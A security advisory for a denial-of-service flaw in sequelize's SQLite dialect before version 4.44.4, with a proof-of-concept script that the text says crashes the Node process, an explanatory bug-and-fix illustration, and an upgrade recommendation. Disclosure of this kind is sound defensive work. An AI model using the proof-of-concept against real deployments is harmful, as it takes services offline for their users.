Versions of sequelize prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a TypeError exception for the results variable. The results value may be undefined and trigger the error on a .map call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.

The following proof-of-concept crashes the Node process:
const Sequelize = require('sequelize');

// SQLite dialect, file-backed database
const sequelize = new Sequelize({
  dialect: 'sqlite',
  storage: 'database.sqlite'
});

// Simple model with a single string column (the model name is arbitrary)
const TypeError = sequelize.define('TypeError', {
  name: Sequelize.STRING,
});

// Creating the table and inserting the row reaches the code path where
// `results` is undefined; the uncaught TypeError from .map brings the process down.
TypeError.sync({force: true}).then(() => {
  return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"});
});
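To make the failure mode and the shape of the fix concrete, here is an added example (not sequelize's own code) that models a driver callback handing back an undefined result set; handleResultsUnguarded, handleResultsGuarded, runQuery and the fake drivers are hypothetical names chosen for this illustration.

```javascript
// Added example, not sequelize's own code: models the bug described above.
// A result handler that assumes `results` is always an array throws a
// TypeError when the driver passes undefined. Thrown from inside a driver
// callback with no try/catch, that exception is uncaught and ends the process.

// Hypothetical unguarded handler: mirrors the unchecked `results.map` call.
function handleResultsUnguarded(results) {
  return results.map((row) => row.name);
}

// Hardened handler: a missing result set is treated as empty.
function handleResultsGuarded(results) {
  const rows = Array.isArray(results) ? results : [];
  return rows.map((row) => row.name);
}

// Wraps a callback-style query so that anything thrown by the handler becomes
// a rejected promise the caller can .catch(), instead of an uncaught exception.
function runQuery(executeQuery, handler) {
  return new Promise((resolve, reject) => {
    executeQuery((err, results) => {
      if (err) return reject(err);
      try {
        resolve(handler(results));
      } catch (e) {
        reject(e); // surfaces the TypeError to the caller; process stays up
      }
    });
  });
}

// Constructed stand-ins for the driver (sample input, not real sqlite3 calls).
function fakeDriverNoResults(cb) { cb(null, undefined); }
function fakeDriverRows(cb) { cb(null, [{ name: 'alice' }, { name: 'bob' }]); }

// Runs both handlers against the empty result set and reports what happened.
function demo() {
  return Promise.all([
    runQuery(fakeDriverNoResults, handleResultsUnguarded)
      .then(() => 'unguarded: no error', (e) => `unguarded: ${e.name}`),
    runQuery(fakeDriverNoResults, handleResultsGuarded)
      .then((rows) => `guarded: ${rows.length} rows`),
  ]);
}

demo().then((lines) => lines.forEach((l) => console.log(l)));
```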
Recommendation
Upgrade to version 4.44.4 or later.
References